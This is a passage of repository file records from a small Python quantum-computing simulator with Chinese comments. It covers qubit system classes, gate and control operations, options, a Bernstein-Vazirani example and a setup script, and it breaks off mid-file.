B[::-1]\n with TemporaryBits(Cin.system, n - 1) as tmp:\n carries = Cin + tmp + Cout\n for index in range(n):\n q0 = carries[index]\n q1 = A_[index]\n q2 = B_[index]\n q3 = carries[index + 1]\n CCNOT(q1, q2, q3)\n CNOT(q1, q2)\n CCNOT(q0, q2, q3)\n CNOT(A_[-1], B_[-1])\n CNOT(carries[-2], B_[-1])\n CNOT(A_[-1], B_[-1])\n for index in range(n-2, -1, -1):\n q0 = carries[index]\n q1 = A_[index]\n q2 = B_[index]\n q3 = carries[index + 1]\n CCNOT(q0, q2, q3)\n CNOT(q1, q2)\n CCNOT(q1, q2, q3)\n CNOT(q0, q2)\n CNOT(q1, q2)\n" }, { "alpha_fraction": 0.512204647064209, "alphanum_fraction": 0.5159698724746704, "avg_line_length": 29.563491821289062, "blob_id": "478a76c34e6a2fed27bd190f93329175e748781d", "content_id": "bd142ab590d7e5cdf8b76f8e6faa299ec40c9102", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7736, "license_type": "no_license", "max_line_length": 79, "num_lines": 252, "path": "/nyasQuantumCalculate/RevCal/System.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any, List, Tuple, Union\n\nfrom nyasQuantumCalculate.Options import *\n\n\n__all__ = [\"BitsSystem\", \"Bit\", \"Bits\", \"TemporaryBit\", \"TemporaryBits\",\n \"inSameSystem\"]\n\n\nclass id_manager:\n _last_id = -1\n\n @classmethod\n def getID(cls) -> int:\n cls._last_id += 1\n return cls._last_id\n\n\nclass BitsSystem:\n def __init__(self, nBits: int) -> None:\n self.states = [False] * nBits\n self._id = id_manager.getID()\n self.ctlBits: List[int] = list()\n self._ctlBitPkgs: List[List[int]] = list()\n self._tracker: List[Tuple[Tuple[int, ...],\n Tuple[int, ...], str]] = list()\n self.stopTracking = False\n\n def __del__(self) -> None:\n if Options.checkCleaningSystem and any(self.states):\n raise RuntimeError(\"Before cleaning up bits system, \"\n \"system should be reset.\")\n\n @property\n def nBits(self) -> int: return len(self.states)\n\n @property\n def id(self) -> int: return self._id\n\n def getBit(self, idx: int) -> Any:\n raise NotImplementedError\n\n def getBits(self, *idxs: int) -> Any:\n raise NotImplementedError\n\n def __getitem__(self, idx: Union[int, slice]) -> Any:\n raise NotImplementedError\n\n def restart(self) -> None:\n for index in range(self.nBits):\n self.states[index] = False\n\n ########################## Related to tracking ##########################\n\n def canTrack(self) -> bool:\n return Options.allowTracking and not self.stopTracking\n\n def addTrack(self, name: str, *idxs: int) -> None:\n self._tracker.append((tuple(self.ctlBits), tuple(idxs), name))\n\n #################### Related to controlling bits ########################\n\n def addControllingBits(self, *idxs: int) -> None:\n if not idxs:\n return\n if any(idx in self.ctlBits for idx in idxs):\n raise ValueError(\"Controlling bit are added repeatedly.\")\n self._ctlBitPkgs.append(list(idxs))\n self.updateControllingBits()\n\n def popControllingBits(self) -> None:\n if not self._ctlBitPkgs:\n return\n self._ctlBitPkgs.pop()\n self.updateControllingBits()\n\n def updateControllingBits(self) -> None:\n self.ctlBits.clear()\n if not self._ctlBitPkgs:\n return\n for pkg in self._ctlBitPkgs:\n self.ctlBits += pkg\n\n ##################### Related to temporary bit ##########################\n\n def addBits(self, nBits: int) -> None:\n if nBits <= 0:\n raise ValueError(f\"Cannot add {nBits} bits.\")\n self.states += [False] * nBits\n\n def popBits(self, nBits: int) -> None:\n if nBits <= 0:\n raise ValueError(f\"Cannot add {nBits} bits.\")\n if any(idx >= self.nBits - nBits for idx in self.ctlBits):\n raise ValueError(\"The qubit removed is controlling bit.\")\n self.states = self.states[:-nBits]\n\n\n###############################################################################\n###############################################################################\n\n\nclass Bit:\n def __init__(self, bsys: BitsSystem, idx: int) -> None:\n if not 0 <= idx < bsys.nBits:\n raise ValueError(f\"The qubit indexed {idx} does not exist.\")\n self.system = bsys\n self.index = idx\n\n def __add__(self, other: Union[\"Bit\", \"Bits\"]) -> Any:\n raise NotImplementedError\n\n def asBits(self) -> Any:\n raise NotImplementedError\n\n\nclass TemporaryBit:\n def __init__(self, bsys: BitsSystem):\n self.system = bsys\n\n def __enter__(self) -> Bit:\n self.system.addBits(1)\n return Bit(self.system, self.system.nBits - 1)\n\n def __exit__(self, *error: Any) -> None:\n self.system.popBits(1)\n\n\n###############################################################################\n###############################################################################\n\n\nclass Bits:\n def __init__(self, bsys: BitsSystem, *idxs: int) -> None:\n if not all(0 <= index < bsys.nBits for index in idxs):\n raise ValueError(\"Input parameters are out of range.\")\n self.system = bsys\n self.indexes = list(idxs)\n self._ptr = 0\n\n def __len__(self) -> int: return len(self.indexes)\n\n def __getitem__(self, idxx: Union[slice, int]) -> Any:\n if isinstance(idxx, slice):\n return Bits(self.system, *self.indexes[idxx])\n return Bit(self.system, self.indexes[idxx])\n\n def __iter__(self) -> \"Bits\":\n self._ptr = 0\n return self\n\n def __next__(self) -> Bit:\n if self._ptr < len(self.indexes):\n self._ptr += 1\n return Bit(self.system, self.indexes[self._ptr - 1])\n raise StopIteration\n\n def __iadd__(self, other: Union[Bit, \"Bits\"]) -> \"Bits\":\n assert self.system.id == other.system.id\n if isinstance(other, Bit):\n self.indexes.append(other.index)\n else:\n self.indexes += other.indexes\n return self\n\n def __add__(self, other: Union[Bit, \"Bits\"]) -> \"Bits\":\n result = Bits(self.system)\n result.indexes = self.indexes.copy()\n result += other\n return result\n\n\nclass TemporaryBits:\n def __init__(self, bsys: BitsSystem, nBits: int):\n self.system = bsys\n self.nBits = nBits\n\n def __enter__(self) -> Bits:\n self.system.addBits(self.nBits)\n return Bits(self.system, *range(self.system.nBits - self.nBits,\n self.system.nBits))\n\n def __exit__(self, *error: Any) -> None:\n self.system.popBits(self.nBits)\n\n\n###############################################################################\n###############################################################################\n\n\ndef BitsSystem_getBit(self: BitsSystem, idx: int) -> Bit:\n return Bit(self, idx)\n\n\ndef Bit___add__(self: Bit, other: Union[Bit, Bits]) -> Bits:\n if isinstance(other, Bits):\n return Bits(self.system, self.index, *other.indexes)\n return Bits(self.system, self.index, other.index)\n\n\ndef Bit_asBits(self: Bit) -> Bits:\n return Bits(self.system, self.index)\n\n\ndef BitsSystem_getBits(self: BitsSystem, *idxs: int) -> Bits:\n if len(idxs) == 0:\n return Bits(self, *range(self.nBits))\n return Bits(self, *idxs)\n\n\ndef BitsSystem___getitem__(self: BitsSystem,\n idx: Union[int, slice]) -> Any:\n if isinstance(idx, slice):\n step: int = idx.step or 1\n if step > 0:\n start = idx.start or 0\n stop = idx.stop or self.nBits\n else:\n start = idx.start or self.nBits - 1\n stop = idx.stop or -1\n if start < 0:\n start += self.nBits\n if stop < 0:\n stop += self.nBits\n return Bits(self, *range(start, stop, step))\n else:\n if idx < 0:\n idx += self.nBits\n return Bit(self, idx)\n\n\nBit.__add__ = Bit___add__\nBit.asBits = Bit_asBits\n\nBitsSystem.getBit = BitsSystem_getBit\nBitsSystem.getBits = BitsSystem_getBits\nBitsSystem.__getitem__ = BitsSystem___getitem__\n\n###############################################################################\n###############################################################################\n\n\ndef inSameSystem(*args: Union[Bit, Bits, BitsSystem]) -> bool:\n \"\"\"检查输入是否处于同一个量子位系统内\"\"\"\n ele0 = args[0]\n id = (ele0 if isinstance(ele0, BitsSystem) else ele0.system).id\n for ele in args[1:]:\n if (ele if isinstance(ele, BitsSystem) else ele.system).id != id:\n return False\n return True\n" }, { "alpha_fraction": 0.5961138010025024, "alphanum_fraction": 0.6138098835945129, "avg_line_length": 25.200000762939453, "blob_id": "881a86efa06f2598b20fb1ad9efae6f8fe73ccab", "content_id": "92c6cf3ca8a3a48d012c7c4ed06b5c99839d802c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3176, "license_type": "no_license", "max_line_length": 62, "num_lines": 110, "path": "/nyasQuantumCalculate/Options.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"用于控制库的一些默认行为\n\nsee more: `help(Options)` or `help(TemporaryOptions)`\n\"\"\"\n\nfrom typing import Any\n\n\n__all__ = [\"Options\", \"TemporaryOptions\", \"TempOption\"]\n\n\nclass _options:\n \"\"\"不应该由用户实例化这个对象\n\n Attributes:\n autoNormalize: 自动在作用位门后归一化系统 [default: True]\n allowTracking: 跟踪量子位系统的每一个操作 [default: False]\n littleEndian: 小端模式 [default: False]\n QFTwithNumpy: 使用numpy而不是位门实现QFT [default: True]\n checkCleaningSystem: 清除系统时检查系统是否已被重置 [default: True]\n QFTswap: 默认QFT在末端有SWAP操作, 但有些操作不需要SWAP [default: True]\n inputCheck: 对位门输入进行检查, 避免造成错误的逻辑结果 [default: True]\n\n To use: (littleEndian)\n >>> qbsys = QubitsSystem(2)\n >>> H(qbsys[0])\n >>> qbsys.states\n array([[0.70710678+0.j],\n [0. +0.j],\n [0.70710678+0.j],\n [0. +0.j]])\n >>> Options.reverseBitIndex = True\n array([[0.70710678+0.j],\n [0.70710678+0.j],\n [0. +0.j],\n [0. +0.j]])\n \"\"\"\n def __init__(self) -> None:\n self.autoNormalize = True\n self.allowTracking = False\n self.littleEndian = False\n self.QFTwithNumpy = True\n self.checkCleaningSystem = True\n self.QFTswap = True\n self.inputCheck = True\n\n\nOptions = _options()\n\n\nclass TempOption:\n \"\"\"see more: help(TemporaryOptions)\"\"\"\n def __init__(self, option: str, after: bool) -> None:\n Options.__getattribute__(option)\n self.option = option\n self._after = after\n self._before = False\n\n def __enter__(self) -> None:\n self._before = Options.__getattribute__(self.option)\n Options.__setattr__(self.option, self._after)\n\n def __exit__(self, *error: Any) -> None:\n Options.__setattr__(self.option, self._before)\n\n\nclass TemporaryOptions:\n \"\"\"不应该由用户实例化这个对象\n\n 配合with语句在代码块中临时把设置改为特定值\n\n To use:\n >>> Options.autoNormalize\n True\n >>> with TemporaryOptions.autoNormalize(False):\n ... print(Options.autoNormalize)\n ...\n False\n >>> Options.autoNormalize\n True\n \"\"\"\n @staticmethod\n def autoNormalize(after: bool) -> TempOption:\n return TempOption(\"autoNormalize\", after)\n\n @staticmethod\n def allowTracking(after: bool) -> TempOption:\n return TempOption(\"allowTracking\", after)\n\n @staticmethod\n def littleEndian(after: bool) -> TempOption:\n return TempOption(\"littleEndian\", after)\n\n @staticmethod\n def QFTwithNumpy(after: bool) -> TempOption:\n return TempOption(\"QFTwithNumpy\", after)\n\n @staticmethod\n def checkCleaningSystem(after: bool) -> TempOption:\n return TempOption(\"checkCleaningSystem\", after)\n\n @staticmethod\n def QFTswap(after: bool) -> TempOption:\n return TempOption(\"QFTswap\", after)\n\n @staticmethod\n def inputCheck(after: bool) -> TempOption:\n return TempOption(\"inputCheck\", after)\n" }, { "alpha_fraction": 0.6598465442657471, "alphanum_fraction": 0.6675191521644592, "avg_line_length": 29.076923370361328, "blob_id": "82f6f5e2b2504159dfbb17dc4502d39f6f8e5c53", "content_id": "6650805e58c61ea6746233d402569c1f15ff499e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 65, "num_lines": 13, "path": "/setup.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\nsetup(\n name = \"nyasQuantumCalculate\",\n version = \"0.1.2\",\n author = \"nyasyamorina\",\n author_email = \"[email protected]\",\n description = \"A Simple Quantum Calculation Simulate Packge\",\n url = \"https://github.com/nyasyamorina/nyasQuantumCalculate\",\n packages = find_packages(),\n install_requires = [\"numpy\"],\n zip_safe = False,\n)\n" }, { "alpha_fraction": 0.5105041861534119, "alphanum_fraction": 0.5241596698760986, "avg_line_length": 22.50617218017578, "blob_id": "536045c0676d42bf1f637b4c4cf4bfe6bbdd444f", "content_id": "a03084afccac8993d5841addd5486b71416869a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2267, "license_type": "no_license", "max_line_length": 91, "num_lines": 81, "path": "/examples/3-BernsteinVaziraniAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom typing import List\n\nimport numpy as np\n\nfrom nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Utils import Int2Bools\n\n\n################################ 问题 ########################################\n\"\"\"\n有一个带参黑盒 f_s(x) = s·x; s,x是n比特整数, s·x为s与x在{0,1}^n里的内积, 也就是\ns·x = s1*x1⊕s2*x2⊕...⊕sn*sn, ⊕是异或\n\n通过调用黑盒求s\n\"\"\"\n\nn = 4 # 比特串的长度\n\n\n############################### 初始化黑盒 ###################################\n# 目标比特串\ns = Int2Bools(int(2 ** n * np.random.random()), n) # 随机生成一个比特串\nprint(f\"bit string: [{''.join(map(lambda b: '1' if b else '0', s))}]\")\n\ndef UnknownClassical(x: int) -> bool:\n \"\"\"提供给传统算法的接口\"\"\"\n res = False\n for ele in s:\n # x & 1 == 1 可以提取x最右端的bit并转为bool\n res ^= ele and (x & 1 == 1)\n x >>= 1\n return res\n\ndef UnknownQuantum(qbs: Qubits):\n \"\"\"提供给量子算法的接口\"\"\"\n ApplyFromBools(Builtin.Z, s, qbs)\n\n\n################################# 传统算法 ###################################\n\"\"\"传统算法需要调用n次黑盒才可以得到s\n每次提取s的1个bit\"\"\"\n\ndef mainClassical():\n x = 1\n result: List[bool] = list()\n for _ in range(n):\n result.append(UnknownClassical(x))\n x <<= 1\n # 输出\n print(f\"bit string (Classical): [{''.join(map(lambda b: '1' if b else '0', result))}]\")\n\nmainClassical()\n\n\n################################# 量子算法 ###################################\n\"\"\"量子算法只需要调用1次黑盒就可以得到s\n原理与频谱分析有关, 见阿达马变换 https://en.wikipedia.org/wiki/Hadamard_transform\"\"\"\n\ndef mainQuantum():\n # 初始化量子位系统\n qbsys = QubitsSystem(n)\n qbs = qbsys.getQubits()\n\n # BernsteinVazirani算法\n ApplyToEach(Builtin.H, qbs)\n UnknownQuantum(qbs)\n ApplyToEach(Builtin.H, qbs)\n\n # 测量并重设所有量子位\n result = Builtin.MA(qbs)\n Builtin.RA(qbs)\n\n # 输出\n print(f\"bit string (Quantum): [{''.join(map(lambda b: '1' if b else '0', result))}]\")\n\nmainQuantum()\n" }, { "alpha_fraction": 0.5018116235733032, "alphanum_fraction": 0.5289855003356934, "avg_line_length": 27.675325393676758, "blob_id": "55563b1c3f68ebca6b54949cf2a093086abd3ac9", "content_id": "48bb7a73974498572ea0219405b6d71812a05c97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2350, "license_type": "no_license", "max_line_length": 80, "num_lines": 77, "path": "/nyasQuantumCalculate/Operate/SWAP.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .ControlMethod import *\nfrom .SingleQubitGate import *\nfrom .QubitsOperation import *\nfrom nyasQuantumCalculate.Options import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"SWAP\"]\n\n\nclass _SWAP(QubitsOperation):\n \"\"\"交换量子位数据\n\n 量子数据可以移动但不可复制, 这里是直接交换两个量子位的数据. 两个\n 量子位必须处于相同的量子位系统.\n\n To use:\n >>> qbsys = QubitsSystem(2)\n >>> q0, q1 = qbsys.getQubits()\n >>> X(q0)\n >>> qbsys.states\n array([[0.+0.j],\n [1.+0.j],\n [0.+0.j],\n [0.+0.j]])\n >>> SWAP(q0, q1)\n array([[0.+0.j],\n [0.+0.j],\n [1.+0.j],\n [0.+0.j]])\n \"\"\"\n def __init__(self) -> None:\n super().__init__()\n self.name = \"SWAP\"\n self.trackable = True\n self.controllable = True\n\n def call(self, q0: Qubit, q1: Qubit) -> None:\n qbsys = q0.system\n if qbsys.nControllingQubits == 0:\n qbsys.statesNd = qbsys.statesNd.swapaxes(\n qbsys.statesNdIndex(q0.index),\n qbsys.statesNdIndex(q1.index)\n )\n else:\n # 事实上, 受控SWAP应该为\n # CNOT(q1, q0); Controlled(CNOT, ctlQbs, q0, q1); CNOT(q1, q0)\n # 而这里是\n # Controlled(CNOT, ctlQbs, q1, q0)\n # Controlled(CNOT, ctlQbs, q0, q1)\n # Controlled(CNOT, ctlQbs, q1, q0)\n # 结果上相同就好\n CNOT(q1, q0)\n CNOT(q0, q1)\n CNOT(q1, q0)\n\n def __call__(self, q0: Qubit, q1: Qubit) -> None:\n if Options.inputCheck:\n if not inSameSystem(q0, q1):\n raise ValueError(\"Two qubits are in different qubit system.\")\n if any(isControllingQubits(q0, q1)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if haveSameQubit(q0, q1):\n raise ValueError(\"Cannot swap the same qubit.\")\n qbsys = q0.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, q0.index, q1.index)\n qbsys.stopTracking = True\n self.call(q0, q1)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nSWAP = _SWAP()\n" }, { "alpha_fraction": 0.4510028660297394, "alphanum_fraction": 0.49398282170295715, "avg_line_length": 25.439393997192383, "blob_id": "51ca02bb21789212dd646b5cd7eabf23f35b599a", "content_id": "1257f8966eb965761f111dcdf032e6f48d56345e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1745, "license_type": "no_license", "max_line_length": 79, "num_lines": 66, "path": "/randerColorWheel.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom nyasQuantumCalculate.Utils import ColorWheel2RGB\n\n\nfigSize = 500\nbgColor = \"#262626\"\n\nwheelRange = (0.4, 0.9)\nfadeWidth = 0.05\n\n##############################################################################\n\nbgc = np.array((int(bgColor[1:3], 16),\n int(bgColor[3:5], 16),\n int(bgColor[5:], 16)), np.uint8)\n\nfig = np.ones((figSize, figSize, 3), np.uint8) * bgc\n\nrsize_2 = 2 / figSize\nRRin = wheelRange[0] * wheelRange[0]\nRRout = wheelRange[1] * wheelRange[1]\nk = 1 / fadeWidth\nb0 = wheelRange[0] * k\nb1 = wheelRange[1] * k\n\ntotalRun = figSize * figSize\ncountRun = 0\n\nfor yf in range(figSize):\n y = yf * rsize_2 - 1\n for xf in range(figSize):\n x = xf * rsize_2 - 1\n rr = x * x + y * y\n if RRin <= rr <= RRout:\n r = np.sqrt(rr)\n color = np.array(ColorWheel2RGB(np.angle(x - 1j * y)), np.uint8)\n alpha = np.clip(min(k * r - b0, -k * r + b1), 0., 1.)\n color = color * alpha + bgc * (1. - alpha)\n color = np.clip(color, 0., 255.)\n fig[yf, xf] = color\n countRun += 1\n prop = countRun / totalRun\n barL = int(50 * prop - 1)\n print(f\"[{100 * prop:.1f}%%] \"\n f\"[{'=' * max(barL, 0)}>{' ' * max(49 - barL, 0)}]\", end='\\r')\nprint()\n\n###############################################################################\n\nfile_name = \"ColorWheel.png\"\n\ntry:\n import cv2\nexcept ModuleNotFoundError:\n try:\n from PIL import Image\n except ModuleNotFoundError:\n from matplotlib import pyplot as plt\n plt.imsave(file_name, fig)\n else:\n Image.fromarray(fig).save(file_name)\nelse:\n cv2.imwrite(file_name, fig[..., ::-1])\n" }, { "alpha_fraction": 0.5851181149482727, "alphanum_fraction": 0.5965996980667114, "avg_line_length": 27.306249618530273, "blob_id": "e1422ca16fd9210928c85a4b6ea2f5d0dda14f46", "content_id": "828f5a3e3f8cffdbf3af09935744946faf28d0bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5033, "license_type": "no_license", "max_line_length": 80, "num_lines": 160, "path": "/nyasQuantumCalculate/Operate/ControlMethod.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom nyasQuantumCalculate.Options import Options\nfrom typing import Any, Callable, Iterable, Union\n\nfrom .QubitsOperation import *\nfrom .SingleQubitGate import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"Controlled\", \"ControlledOnInt\", \"Toffoli\", \"CNOT\", \"CCNOT\"]\n\n\ndef Controlled(opr: Union[OperationLike, Callable[[Any], Any]], ctlQbs: Qubits,\n *args: Any, **kwargs: Any) -> Any:\n \"\"\"控制过程\n\n 把普通可控的量子位过程转为控制过程, 暂时只有单量子位门属于可控过程.\n\n Args:\n opr: 可控的量子位过程\n ctlQbs: 控制位\n *args, **kwargs: 输入到过程的参数\n\n Returns:\n opr返回的值\"\"\"\n operation = QubitsOperation.getOperation(opr)\n if isinstance(operation, QubitsOperation) and not operation.controllable:\n raise ValueError(\"Target process is uncontrollable.\")\n ctlQbs.system.addControllingQubits(*ctlQbs.indexes)\n result = operation(*args, **kwargs)\n ctlQbs.system.popControllingQubits()\n return result\n\n\ndef ControlledOnBools(opr: OperationLike, bools: Iterable[bool], ctlQbs: Qubits,\n *args: Any, **kwargs: Any) -> Any:\n \"\"\"整数控制过程\n\n 类似`Controlled`, 但只有控制位符合bools(而不是全部为1)时, 触发\n 过程opr. 当bools比ctlQbs长时会截断bools, 而bools比ctlQbs短时\n 会使用True填充bools.\n\n Args:\n opr: 可控的量子位过程\n bools: bool列表\n ctlQbs: 控制位\n *args, **kwargs: 输入到过程的参数\n\n Returns:\n opr返回的值\n \"\"\"\n for bit, qubit in zip(bools, ctlQbs):\n if not bit:\n X(qubit)\n result = Controlled(opr, ctlQbs, *args, **kwargs)\n for bit, qubit in zip(bools, ctlQbs):\n if not bit:\n X(qubit)\n return result\n\n\ndef ControlledOnInt(opr: OperationLike, integer: int, ctlQbs: Qubits,\n *args: Any, **kwargs: Any) -> Any:\n \"\"\"整数控制过程\n\n 类似`Controlled`, 但只有控制位符合integer(而不是全部为1)时, 触发\n 过程opr. 当integer位数比ctlQbs长时会截断高位\n\n Args:\n opr: 可控的量子位过程\n integer: 目标整数\n ctlQbs: 控制位\n *args, **kwargs: 输入到过程的参数\n\n Returns:\n opr返回的值\n \"\"\"\n bits = Int2Bools(integer, len(ctlQbs))\n result = ControlledOnBools(opr, bits, ctlQbs, *args, **kwargs)\n return result\n\n\nclass _CNOT(QubitsOperation):\n \"\"\"CNOT门 (可逆XOR门)\n\n 两个量子位必须处于相同的量子位系统.\n\n Args:\n q0: 控制位\n q1: 被控制位\n \"\"\"\n def __init__(self) -> None:\n super().__init__()\n self.name = \"CNOT\"\n self.controllable = True\n\n def call(self, q0: Qubit, q1: Qubit) -> None:\n Controlled(X, q0.asQubits(), q1)\n\n def __call__(self, q0: Qubit, q1: Qubit) -> None:\n if Options.inputCheck:\n if not inSameSystem(q0, q1):\n raise ValueError(\"Two qubits are in different qubit system.\")\n if any(isControllingQubits(q0, q1)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if haveSameQubit(q0, q1):\n raise ValueError(\"Controlling bit and controlled bit \"\n \"should not be the same qubit.\")\n qbsys = q0.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, q0.index, q1.index)\n qbsys.stopTracking = True\n self.call(q0, q1)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nclass _CCNOT(QubitsOperation):\n \"\"\"Toffoli门 (CCNOT门, 可逆AND门)\n\n 三个量子位必须处于相同的量子位系统.\n\n Args:\n q0: 控制位\n q1: 控制位\n q2: 被控制位\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"CCNOT\"\n self.controllable = True\n\n def call(self, q0: Qubit, q1: Qubit, q2: Qubit) -> None:\n Controlled(X, q0 + q1, q2)\n\n def __call__(self, q0: Qubit, q1: Qubit, q2: Qubit) -> None:\n if Options.inputCheck:\n if not inSameSystem(q0, q1, q2):\n raise ValueError(\"Three qubits are in different qubit system.\")\n if any(isControllingQubits(q0, q1, q2)):\n raise ValueError(\"Controlled process operates controlling bit.\")\n if haveSameQubit(q0, q1, q2):\n raise ValueError(\"CCNOT gate accept 3 different qubits.\")\n qbsys = q0.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, q0.index, q1.index, q2.index)\n qbsys.stopTracking = True\n self.call(q0, q1, q2)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nCNOT = _CNOT()\nCCNOT = _CCNOT()\nToffoli = CCNOT\n" }, { "alpha_fraction": 0.6654275059700012, "alphanum_fraction": 0.6710036993026733, "avg_line_length": 25.899999618530273, "blob_id": "c2549e35c2c6e27e13939e45cae79fb19f414e91", "content_id": "9fe2bfba137d5748d2796b97c11fe3d400e88700", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 704, "license_type": "no_license", "max_line_length": 81, "num_lines": 20, "path": "/nyasQuantumCalculate/RevCal/__init__.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .HighLevel import *\nfrom .Operate import *\nfrom .System import *\nfrom . import Builtin\n\n\n__all__ = [\"BitsSystem\", \"Bit\", \"Bits\", \"TemporaryBit\", \"TemporaryBits\",\n \"BitsOperation\", \"Controlled\", \"ControlledOnBools\", \"ControlledOnInt\",\n \"ApplyToEach\", \"ApplyFromBools\", \"ApplyFromInt\", \"Toffoli\",\n \"Builtin\", \"Adder\"]\n\n\n\"\"\"\n强行模拟电子计算机的可逆逻辑计算. 没有相位, 叠加态, 纠缠等量子特性, 只有0和1.\n这个库用于以少内存开销验证逻辑电路的正确性. 见 `examples/others/Adder.py`\n\n这部分大部分方法是从 nyasQuantumCalculate 复制粘贴过来的, 并不能完全保证正常工作.\n\"\"\"\n" }, { "alpha_fraction": 0.636820912361145, "alphanum_fraction": 0.6388329863548279, "avg_line_length": 21.590909957885742, "blob_id": "c31e33f86f619e9f4f7dddc8aefa1feb110167a8", "content_id": "a6a110e82f2b48a29d5322b0996be557fa938796", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1216, "license_type": "no_license", "max_line_length": 75, "num_lines": 44, "path": "/nyasQuantumCalculate/Operate/ApplyMethod.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Iterable\n\nfrom .SingleQubitGate import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"ApplyToEach\", \"ApplyFromBools\", \"ApplyFromInt\"]\n\n\ndef ApplyToEach(gate: SingleQubitGate, qbs: Qubits) -> None:\n \"\"\"把单量子位门作用到qbs的每个量子位上\"\"\"\n for qb in qbs:\n gate(qb)\n\n\ndef ApplyFromBools(gate: SingleQubitGate, bools: Iterable[bool],\n qbs: Qubits) -> None:\n \"\"\"使用bool控制单量子位门\n\n 把位门作用到bools里为True的相应索引的量子位上. bools和qbs长度不同时取最短.\n\n Args:\n gate: 需要作用的单量子位门\n bools: bool列表\n qbs: 多个量子位\"\"\"\n for b, qb in zip(bools, qbs):\n if b:\n gate(qb)\n\n\ndef ApplyFromInt(gate: SingleQubitGate, integer: int, qbs: Qubits) -> None:\n \"\"\"使用int控制单量子位门\n\n 如同`ApplyFromBools`差不多, 但bool列表从integer里推导.\n\n Args:\n gate: 需要作用的单量子位门\n integer: 控制用的整数\n qbs: 多个量子位\"\"\"\n bits = Int2Bools(integer, len(qbs))\n ApplyFromBools(gate, bits, qbs)\n" }, { "alpha_fraction": 0.5388994216918945, "alphanum_fraction": 0.5488615036010742, "avg_line_length": 24.095237731933594, "blob_id": "11b5a187453974ef5f20eb2cbc034c8c57523358", "content_id": "20d7022c88ebc3b2217bd72301496029ec27a002", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2328, "license_type": "no_license", "max_line_length": 75, "num_lines": 84, "path": "/nyasQuantumCalculate/Operate/Reset.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom .QubitsOperation import *\nfrom nyasQuantumCalculate.Utils import *\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"R\", \"RA\"]\n\n\nclass _RESET(QubitsOperation):\n \"\"\"重置一个量子位\n\n 注意量子位只能重置振幅而不能重置相位, 如果可能的话\n 请使用位门偏转相位再重置量子位.\n\n Args:\n qb: 需要重置的量子位\n \"\"\"\n def __init__(self) -> None:\n super().__init__()\n self.name = \"RESET\"\n self.trackable = True\n\n def call(self, qb: Qubit) -> None:\n qbsys = qb.system\n states = qbsys.statesNd.swapaxes(0, qbsys.statesNdIndex(qb.index))\n prob0 = sss(states[0, ...])\n if equal0(prob0):\n states[0, ...] = states[1, ...]\n states[0, ...] /= np.sqrt(sss(states[0, ...]))\n states[1, ...] *= 0.\n\n def __call__(self, qb: Qubit) -> None:\n qbsys = qb.system\n sysStopTrack = qbsys.stopTracking\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(self.name, qb.index)\n qbsys.stopTracking = True\n self.call(qb)\n if not sysStopTrack:\n qbsys.stopTracking = False\n\n\nclass _RESETALL(QubitsOperation):\n \"\"\"重置一个量子位\n\n 注意量子位只能重置振幅而不能重置相位, 如果可能的话\n 请使用位门偏转相位再重置量子位.\n\n Args:\n qbs: 需要重置的多个量子位\n \"\"\"\n\n def __init__(self) -> None:\n super().__init__()\n self.name = \"RESETALL\"\n self.trackable = True\n\n def call(self, qbs: Qubits) -> None:\n qbsys = qbs.system\n for index in qbs.indexes:\n 